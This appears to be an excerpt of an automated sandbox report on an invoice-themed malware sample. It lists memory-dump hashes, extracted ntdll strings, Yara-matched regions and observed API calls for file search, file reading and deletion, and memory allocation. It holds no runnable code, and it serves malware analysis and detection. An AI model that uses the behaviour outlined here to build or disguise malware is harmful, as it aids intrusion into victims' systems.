                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 80e5d52fd85b0ff435e9fa1ac8d6165d08508984879c0818c749407f860c2a97
                                                                                                                                        • Instruction ID: 18facedcbb02f32c4c59ca7c860f0ad61f750b5207b409acb2e7daf1fd0f124d
                                                                                                                                        • Opcode Fuzzy Hash: 80e5d52fd85b0ff435e9fa1ac8d6165d08508984879c0818c749407f860c2a97
                                                                                                                                        • Instruction Fuzzy Hash: 93900261242441536545B19884445074006A7E0241795C423A1814950CC5669966D721
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9d61ce5cba2ddafc39eb1aaa0eece16736b7b5cd4b4fcb06769f0db97789f659
                                                                                                                                        • Instruction ID: df3cafe1bb296f91be2a90b93dd194cce6842b8967c1025327b3c2bc2fa26471
                                                                                                                                        • Opcode Fuzzy Hash: 9d61ce5cba2ddafc39eb1aaa0eece16736b7b5cd4b4fcb06769f0db97789f659
                                                                                                                                        • Instruction Fuzzy Hash: 9F90027120140843E10071988444B46000597E0301F55C427A0524654DC655C9617621
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: cb1a13ad38bd1f8e20c1a80d950958160b375e7fc835ed4b9a24e2196d1a00b8
                                                                                                                                        • Instruction ID: 73b9229ac48a80090a1354173dff18224c2bc93ffd00f0e321ff762f9c07b1a8
                                                                                                                                        • Opcode Fuzzy Hash: cb1a13ad38bd1f8e20c1a80d950958160b375e7fc835ed4b9a24e2196d1a00b8
                                                                                                                                        • Instruction Fuzzy Hash: 1690026120184443E14072988844B0F410597E1202F95C42AA4556554CC95589655721
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 910c4563bd52ced6b2d6928eed7563dec80eee1841982f6d093230d31f92b358
                                                                                                                                        • Instruction ID: 7d14fdf57c22ed72bd96290a216b5a8c6fb2d05c6ea042eb5dc36e87a62e86be
                                                                                                                                        • Opcode Fuzzy Hash: 910c4563bd52ced6b2d6928eed7563dec80eee1841982f6d093230d31f92b358
                                                                                                                                        • Instruction Fuzzy Hash: B890026124140803E1407198C4547070006D7D0601F55C422A0424554DC6568A7567B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: f5f4e105d952de199340d3a757ea6592eedf971237c9ce0198db8f4a26e5d625
                                                                                                                                        • Instruction ID: 3ab93052793c07cbfdbfa881967d5e40b51396e9b0e64e8b6a41783a282b7924
                                                                                                                                        • Opcode Fuzzy Hash: f5f4e105d952de199340d3a757ea6592eedf971237c9ce0198db8f4a26e5d625
                                                                                                                                        • Instruction Fuzzy Hash: 4C90026124545103E150719C84446164005B7E0201F55C432A0C14594DC59589656321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 76a54bee6ebd55469991a96a98c04e654e5ceaf3cee082e51416e5d2b10b0930
                                                                                                                                        • Instruction ID: e9cd087c2623f9f7197056a15733f29753849d7f82edeaaf055a72ffb50fadcd
                                                                                                                                        • Opcode Fuzzy Hash: 76a54bee6ebd55469991a96a98c04e654e5ceaf3cee082e51416e5d2b10b0930
                                                                                                                                        • Instruction Fuzzy Hash: AB90027120240143A54072989844A4E410597E1302B95D826A0415554CC95489715321
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 7b1317bc6569c6c44259873bd052353be7a844828b82c2b81d21ab0273e6c8b5
                                                                                                                                        • Instruction ID: 8acc0800bcdaae316fa5ff6bd7206d6b879e9a78fb6509837804005e50b07395
                                                                                                                                        • Opcode Fuzzy Hash: 7b1317bc6569c6c44259873bd052353be7a844828b82c2b81d21ab0273e6c8b5
                                                                                                                                        • Instruction Fuzzy Hash: A090027520140403E51071989844646004697D0301F55D822A0824558DC69489B1A221
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                        • Instruction ID: d16f16844a40778c201be2b2cbeec34b556c7ffde69767a6d3ca0b9cf8f861aa
                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • Execute=1, xrefs: 01064713
                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01064655
                                                                                                                                        • ExecuteOptions, xrefs: 010646A0
                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01064725
                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01064742
                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010646FC
                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01064787
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010602E7
                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010602BD
                                                                                                                                        • RTL: Re-Waiting, xrefs: 0106031E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                        • Opcode ID: ef82e5b4b030e6cb294241f992b976105f4b09273d00cd0d5314bc2d1fbf85d4
                                                                                                                                        • Instruction ID: a1c9fe9974042f4337046ffa40762c86b8a137c07a8705fa8294de912c944e8c
                                                                                                                                        • Opcode Fuzzy Hash: ef82e5b4b030e6cb294241f992b976105f4b09273d00cd0d5314bc2d1fbf85d4
                                                                                                                                        • Instruction Fuzzy Hash: 75E1CD706087429FD725CF28C884B6ABBE4BF88314F144A99F5E5CB2E5D778D849CB42
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01067B7F
                                                                                                                                        • RTL: Resource at %p, xrefs: 01067B8E
                                                                                                                                        • RTL: Re-Waiting, xrefs: 01067BAC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 0-871070163
                                                                                                                                        • Opcode ID: a00c6b35036193e5bfc75c358a3c79139e1dbf1531e6e82adcd3925e028c771e
                                                                                                                                        • Instruction ID: 183cd6f6b0a6c01ebfa89b7759117b3db2db94f35965a8e47ee2aed4d626b1d1
                                                                                                                                        • Opcode Fuzzy Hash: a00c6b35036193e5bfc75c358a3c79139e1dbf1531e6e82adcd3925e028c771e
                                                                                                                                        • Instruction Fuzzy Hash: 2241D2317047029FD760DE29C840F6AB7E9EF98720F100A5DE9DADB681DB72E9058B91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0106728C
                                                                                                                                        Strings
                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01067294
                                                                                                                                        • RTL: Resource at %p, xrefs: 010672A3
                                                                                                                                        • RTL: Re-Waiting, xrefs: 010672C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                        • Opcode ID: e2665ce89643803e7d43585ebf826455858eeebf6471bc4feca4cb8064475b0f
                                                                                                                                        • Instruction ID: 882e1812dc6fc63fba145516fd8fba8d8a3bba8b8228dd895d2ec386396bdebc
                                                                                                                                        • Opcode Fuzzy Hash: e2665ce89643803e7d43585ebf826455858eeebf6471bc4feca4cb8064475b0f
                                                                                                                                        • Instruction Fuzzy Hash: 1041E031700217ABD721DE29CC81FAAB7E9FF94714F140619F9D5AB280DB21F8468BD1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                        • Opcode ID: 012b58330d1a0d9cc94c49f8c079019e95b4ed59e390b56b59dc6eee3e219fc1
                                                                                                                                        • Instruction ID: 743336d6fac4b98134938ca4da3251164e48698b6dd5dc5ef4089e45119a2742
                                                                                                                                        • Opcode Fuzzy Hash: 012b58330d1a0d9cc94c49f8c079019e95b4ed59e390b56b59dc6eee3e219fc1
                                                                                                                                        • Instruction Fuzzy Hash: 4E316873A001199FDB60DE6DDC40BEF77F8EF55610F8545A6E989E7140EB30DA448BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                        • String ID: +$-
                                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction ID: dc1cabc3237106d8c256fd3009402b58cec379c1b8ef29705d37165cdfe01853
                                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                        • Instruction Fuzzy Hash: 069174B1E0021A9EEB64DF6DC8816BEBBF9BFC4720F14465AE995A72C0D73099408761
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.1897881775.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_fc0000_HYCO_Invoices MS2 & MS3.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $$@
                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                        • Opcode ID: 1401193eb515667a4bfe05dd1ebd37afe9e9427091ffa7adbd5b1d702ecfefe8
                                                                                                                                        • Instruction ID: 98220c52f74fec5a8705318fa8cebd3d67f1bc65a86ed038443adf404ef9d191
                                                                                                                                        • Opcode Fuzzy Hash: 1401193eb515667a4bfe05dd1ebd37afe9e9427091ffa7adbd5b1d702ecfefe8
                                                                                                                                        • Instruction Fuzzy Hash: 2C812C71D0026ADBDB71DB54CC44BEEB7B4AF08714F0041EAAA49B7290E7719E84DFA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:3.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                                        Signature Coverage:2.2%
                                                                                                                                        Total number of Nodes:445
                                                                                                                                        Total number of Limit Nodes:73

                                                                                                                                        Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: L$!e$'$)~$*z$.,$0$3$6$7$8=$:$:^$?$C$ExK$I%$My$O$P5$V$Z$\$^^$b$c$h*$n$nr$r6$s|$t$x$z}$|#$}:$1$B$K$X
                                                                                                                                        • API String ID: 0-580166099
                                                                                                                                        • Opcode ID: ddb933d5282744a56018144fcfdbf29360e82efc3acbb3ca706817d0e4aa13bc
                                                                                                                                        • Instruction ID: 25859ab842da975436e7b888120ef0974b1c37b987396c5bcb0b33d5c42bfa3e
                                                                                                                                        • Opcode Fuzzy Hash: ddb933d5282744a56018144fcfdbf29360e82efc3acbb3ca706817d0e4aa13bc
                                                                                                                                        • Instruction Fuzzy Hash: 5852A9B0D05269CBEB24CF45C898BDDBBB1BB85308F2091D9C0497B292D7B91AC9CF45
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 00E1BCE4
                                                                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 00E1BD1F
                                                                                                                                        • FindClose.KERNELBASE(?), ref: 00E1BD2A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3541575487-0
                                                                                                                                        • Opcode ID: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                        • Instruction ID: a14607327a231ef99dcf5826762ac01ad0fe0539ba2bf2b3bb06cae260e5f6a2
                                                                                                                                        • Opcode Fuzzy Hash: 50f73786ee838472eff2de4eaf51d5b84fb15915995d52bd1371200dd0fcd90b
                                                                                                                                        • Instruction Fuzzy Hash: 833152B19002487BDB24DB64DC85FFF77BCDB44704F145498B959B7181DB70AAC48BA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00E27BB3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                        • Instruction ID: 34201fc8133d479ee24915c7bb0c670fa4d1557419c653035d986751777cc408
                                                                                                                                        • Opcode Fuzzy Hash: f1a78f4b55589ddb4294466f29e55b486997b898f0691f297c04de9d46096fe5
                                                                                                                                        • Instruction Fuzzy Hash: 2C31CEB5A01618AFCB14DF98D881EEEB7F9EF8C714F108219F919A7340D770A8518FA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00E27CFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                        • Instruction ID: f40d5d542a05af351e60727931ada0e3f26e56ad7682ff915f4889481f50c536
                                                                                                                                        • Opcode Fuzzy Hash: a0663551d642bf838d9f8185157d156afba5b51a3f03fc579d2419408eb95df4
                                                                                                                                        • Instruction Fuzzy Hash: F931E2B5A00218AFCB14DF99D881EEFB7F9EF88314F118219F919A7241D774A8118FA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00E1174E,?,?,00000000,00000004,00003000,?,?,?,?,?,?,00E1174E,00E29C21,?,?), ref: 00E27FBD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                        • Opcode ID: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                        • Instruction ID: ab996f9063dc3600b7383efb8447a9beeaffb4a3513884141e75f5b66df1d22d
                                                                                                                                        • Opcode Fuzzy Hash: c968d2b2e4aa0b4894642e0a550f2bdbbbd6a07421370143382189815ec0e192
                                                                                                                                        • Instruction Fuzzy Hash: 262128B5A00659AFDB10DF98DC41EEFB7B9EF88714F008219FD09AB241D774A811CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DeleteFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4033686569-0
                                                                                                                                        • Opcode ID: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                                                                                                                                        • Instruction ID: 8484634f00c6b5a470ce5c567436f75c0e34c90750da5255270f70118759f4ab
                                                                                                                                        • Opcode Fuzzy Hash: 0b287d0c0353dd5c939d8e934007fcd79633c7b86bb8c14e77ef2f41727c4c1f
                                                                                                                                        • Instruction Fuzzy Hash: FD01C471A002287FD610EAA4DC02FFB73ACDF85714F404109FA09AB181D7B079048BE1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00E27DD7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_e00000_replace.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                        • Opcode ID: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                        • Instruction ID: 2ae0b74e7a498bd63a1a99803c6deb730ac6ee54aa9c87de05a8746cbb497978
                                                                                                                                        • Opcode Fuzzy Hash: 50cc50f315f27c916939f5ba168bcb4095037d1bd32af825e022d111ace0ab6f
                                                                                                                                        • Instruction Fuzzy Hash: 67E046362002247BC220AA69DC01FAB77ACEBC5760F41802AFA18AB242C670B90187E5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2890947579.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2890947579.0000000003769000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.000000000376D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        • Associated: 00000005.00000002.2890947579.00000000037DE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_3640000_replace.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                        • Opcode ID: 55fcdb56d85eaef832583a900783710b3c66658576851d542e64db88cfcf79d8
                                                                                                                                        • Instruction ID: 88e0b0c0ddde0c969182e309736b23df845d0577f1a76238b054299e1a869bcf
